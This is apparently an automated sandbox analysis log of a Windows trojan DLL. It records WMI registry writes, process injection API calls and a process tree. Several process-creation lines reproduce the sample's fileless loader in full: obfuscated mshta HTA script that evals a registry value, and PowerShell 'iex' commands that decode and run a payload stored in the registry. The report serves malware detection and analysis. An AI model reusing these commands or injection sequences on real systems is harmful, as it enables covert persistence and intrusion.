Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Contains functionality to call native functions

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10001996 GetProcAddress,NtCreateSection,memset,	0_2_10001996
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10001A44 NtMapViewOfSection,	0_2_10001A44
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_100023A5 NtQueryVirtualMemory,	0_2_100023A5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_0463DDC5 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	3_2_0463DDC5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_0464104F RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,	3_2_0464104F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_046318AC NtQueryInformationProcess,	3_2_046318AC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_046391A2 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,	3_2_046391A2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04623D0F NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,	3_2_04623D0F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_0462E5E9 NtQuerySystemInformation,RtlNtStatusToDosError,	3_2_0462E5E9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_0462DE4B memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,	3_2_0462DE4B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_0462FE2C memset,NtWow64QueryInformationProcess64,GetProcAddress,	3_2_0462FE2C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_0462981E NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,	3_2_0462981E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_046259A0 NtWriteVirtualMemory,VirtualProtectEx,RtlNtStatusToDosError,SetLastError,	3_2_046259A0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_0462F19E NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,	3_2_0462F19E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04625210 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,	3_2_04625210
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04622AB1 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,	3_2_04622AB1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04624358 memset,NtQueryInformationProcess,	3_2_04624358
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_0463B338 NtGetContextThread,RtlNtStatusToDosError,	3_2_0463B338
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_0462DB10 NtWow64ReadVirtualMemory64,GetProcAddress,	3_2_0462DB10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_04E95A27 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	7_2_04E95A27
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_04E96604 GetProcAddress,NtCreateSection,memset,	7_2_04E96604
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_04E94E06 NtMapViewOfSection,	7_2_04E94E06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_04E9B1A5 NtQueryVirtualMemory,	7_2_04E9B1A5
Source: C:\Windows\System32\control.exe	Code function: 50_2_001B1044 NtWriteVirtualMemory,	50_2_001B1044
Source: C:\Windows\System32\control.exe	Code function: 50_2_001A846C NtAllocateVirtualMemory,	50_2_001A846C
Source: C:\Windows\System32\control.exe	Code function: 50_2_0019F8C8 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,	50_2_0019F8C8
Source: C:\Windows\System32\control.exe	Code function: 50_2_001B0CC0 NtCreateSection,	50_2_001B0CC0
Source: C:\Windows\System32\control.exe	Code function: 50_2_001A491C NtSetContextThread,NtUnmapViewOfSection,NtClose,	50_2_001A491C
Source: C:\Windows\System32\control.exe	Code function: 50_2_001B6218 NtMapViewOfSection,	50_2_001B6218
Source: C:\Windows\System32\control.exe	Code function: 50_2_001AB27C NtQueryInformationToken,NtQueryInformationToken,NtClose,	50_2_001AB27C
Source: C:\Windows\System32\control.exe	Code function: 50_2_0019B3A8 NtQueryInformationProcess,	50_2_0019B3A8
Source: C:\Windows\System32\control.exe	Code function: 50_2_0019FBEC NtReadVirtualMemory,	50_2_0019FBEC
Source: C:\Windows\System32\control.exe	Code function: 50_2_001CB002 NtProtectVirtualMemory,NtProtectVirtualMemory,	50_2_001CB002

Contains functionality to launch a process as a different user

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_046326C2 CreateProcessAsUserW,

3_2_046326C2

Detected potential crypto function

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10002184	0_2_10002184
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04642D9C	3_2_04642D9C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04626F3A	3_2_04626F3A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_0462D2AE	3_2_0462D2AE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_04E93EE1	7_2_04E93EE1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_04E9888E	7_2_04E9888E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_04E9AF80	7_2_04E9AF80
Source: C:\Windows\System32\control.exe	Code function: 50_2_001A491C	50_2_001A491C
Source: C:\Windows\System32\control.exe	Code function: 50_2_0019775C	50_2_0019775C
Source: C:\Windows\System32\control.exe	Code function: 50_2_001A1388	50_2_001A1388
Source: C:\Windows\System32\control.exe	Code function: 50_2_00193034	50_2_00193034
Source: C:\Windows\System32\control.exe	Code function: 50_2_001AD834	50_2_001AD834
Source: C:\Windows\System32\control.exe	Code function: 50_2_001B1834	50_2_001B1834
Source: C:\Windows\System32\control.exe	Code function: 50_2_001AEC58	50_2_001AEC58
Source: C:\Windows\System32\control.exe	Code function: 50_2_001910B0	50_2_001910B0
Source: C:\Windows\System32\control.exe	Code function: 50_2_001A58B4	50_2_001A58B4
Source: C:\Windows\System32\control.exe	Code function: 50_2_001A54C8	50_2_001A54C8
Source: C:\Windows\System32\control.exe	Code function: 50_2_001A04C4	50_2_001A04C4
Source: C:\Windows\System32\control.exe	Code function: 50_2_001B10E0	50_2_001B10E0
Source: C:\Windows\System32\control.exe	Code function: 50_2_001BAD08	50_2_001BAD08
Source: C:\Windows\System32\control.exe	Code function: 50_2_0019E158	50_2_0019E158
Source: C:\Windows\System32\control.exe	Code function: 50_2_001A4150	50_2_001A4150
Source: C:\Windows\System32\control.exe	Code function: 50_2_00195998	50_2_00195998
Source: C:\Windows\System32\control.exe	Code function: 50_2_0019D1B8	50_2_0019D1B8
Source: C:\Windows\System32\control.exe	Code function: 50_2_001B1DA8	50_2_001B1DA8
Source: C:\Windows\System32\control.exe	Code function: 50_2_001A79AC	50_2_001A79AC
Source: C:\Windows\System32\control.exe	Code function: 50_2_001B95FC	50_2_001B95FC
Source: C:\Windows\System32\control.exe	Code function: 50_2_0019AE04	50_2_0019AE04
Source: C:\Windows\System32\control.exe	Code function: 50_2_001AB668	50_2_001AB668
Source: C:\Windows\System32\control.exe	Code function: 50_2_001A2A88	50_2_001A2A88
Source: C:\Windows\System32\control.exe	Code function: 50_2_0019BA8C	50_2_0019BA8C
Source: C:\Windows\System32\control.exe	Code function: 50_2_001962DC	50_2_001962DC
Source: C:\Windows\System32\control.exe	Code function: 50_2_001B52C8	50_2_001B52C8
Source: C:\Windows\System32\control.exe	Code function: 50_2_001B86FC	50_2_001B86FC
Source: C:\Windows\System32\control.exe	Code function: 50_2_001B5B1C	50_2_001B5B1C
Source: C:\Windows\System32\control.exe	Code function: 50_2_001B9B14	50_2_001B9B14
Source: C:\Windows\System32\control.exe	Code function: 50_2_001B8B50	50_2_001B8B50
Source: C:\Windows\System32\control.exe	Code function: 50_2_0019EBBC	50_2_0019EBBC
Source: C:\Windows\System32\control.exe	Code function: 50_2_001ACFB4	50_2_001ACFB4
Source: C:\Windows\System32\control.exe	Code function: 50_2_0019FFE8	50_2_0019FFE8

PE file does not import any functions

Source: rzslcw3n.dll.44.dr

Static PE information: No import functions for PE file found

Searches for the Microsoft Outlook file path

Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Tries to load missing DLLs

Source: C:\Windows\SysWOW64\regsvr32.exe

Section loaded: sfc.dll

Jump to behavior

Uses 32bit PE files

Source: 2790000.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: 2790000.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winDLL@82/256@56/19

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_04632517 CloseHandle,CloseHandle,CreateToolhelp32Snapshot,GetModuleHandleA,GetProcAddress,Thread32First,OpenThread,QueueUserAPC,CloseHandle,Thread32Next,CloseHandle,

3_2_04632517

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{D216EB03-DE55-11EB-90EB-ECF4BBEA1588}.dat

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{80E0D293-DF59-B25D-69B4-8306AD28679A}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4596:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5020:120:WilError_01
Source: C:\Windows\System32\control.exe	Mutant created: \Sessions\1\BaseNamedObjects\{3C30E525-6B4E-CE90-D530-CFE2D9647336}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5960:120:WilError_01

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Temp\~DF7279FB1455334C84.TMP

Jump to behavior

Source: 2790000.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\2790000.dll',#1

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\2790000.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\2790000.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\2790000.dll
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\2790000.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\2790000.dll,DllRegisterServer
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17426 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17430 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:82966 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:82970 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:82982 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17460 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17468 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17472 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17480 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:83036 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17500 /prefetch:2
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Vo0g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Vo0g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>'
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:83052 /prefetch:2
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17514 /prefetch:2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17520 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:279558 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:83084 /prefetch:2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rzslcw3n\rzslcw3n.cmdline'
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>N4ot='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(N4ot).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESD796.tmp' 'c:\Users\user\AppData\Local\Temp\rzslcw3n\CSCA64EAED44D2B4776864E5EDA5D4E8B86.TMP'
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Nohx='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Nohx).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:83090 /prefetch:2
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rpyoew2f\rpyoew2f.cmdline'
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17546 /prefetch:2
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES30B.tmp' 'c:\Users\user\AppData\Local\Temp\rpyoew2f\CSCDF3AABDF3FB34DF1A43A4F7FD45C9671.TMP'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xwrbq4ie\xwrbq4ie.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\pkkmtuzt\pkkmtuzt.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES1395.tmp' 'c:\Users\user\AppData\Local\Temp\xwrbq4ie\CSCC07B09CA405E4901BCF4DD90291B57CA.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES1D78.tmp' 'c:\Users\user\AppData\Local\Temp\pkkmtuzt\CSC7DF2BB886B1A41BB8B841DD3834E0B8.TMP'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\2790000.dll',#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\2790000.dll	Jump to behavior
